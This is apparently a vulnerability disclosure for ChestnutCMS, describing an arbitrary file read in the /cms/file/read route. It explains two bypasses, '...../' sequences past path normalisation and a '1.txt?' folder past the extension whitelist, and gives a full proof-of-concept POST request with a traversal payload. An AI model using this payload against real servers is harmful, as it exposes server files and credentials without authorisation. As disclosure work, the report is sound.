Vendor of Product
https://github.com/liweiyi/ChestnutCMS
https://gitee.com/liweiyi/ChestnutCMS
Chestnutcms has an arbitrary file read vulnerability. The /cms/file/read
route can read the filePath path file. There are filtering functions FileExUtils.normalizePath(filePath);
and !EDITABLE_FILE_TYPE.contains(FileExUtils.getExtension(path))
to determine whether the directory is traversed and whether the file type suffix is in the whitelist. NormalizePath can be bypassed by...../
. !EDITABLE_FILE_TYPE.contains(FileExUtils.getExtension(path))
can use the folder creation function to first create a "1.txt?
" directory and then use "1.txt?/...../[file]
" to achieve arbitrary file read.
Vulnerability recurrence
First add the "1.txt?" directory
Then you can use the "cms/file/read" route to read any file
POST /dev-api/cms/file/read HTTP/1.1
Host: 127.0.0.1:1024
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Referer: <http://10.11.35.176:1024/admin/index>
Cookie: Authorization=1c2e571e-fadb-4e6c-aceb-92464899f3b7; Admin-Token=1c2e571e-fadb-4e6c-aceb-92464899f3b7
Accept-Language: zh-CN
Authorization: Bearer 47f03970-5de4-4b2a-8856-40a13a045942
Accept: application/json, text/plain, */*
Content-Type: application/json
{
"filePath": "test1122/1.txt?/...../...../...../shell.jsp"
}
The "FileExUtils.getExtension
" function used in the "FileServiceImpl.java#readFile
" function of file reading can be bypassed by using "1.txt?
”.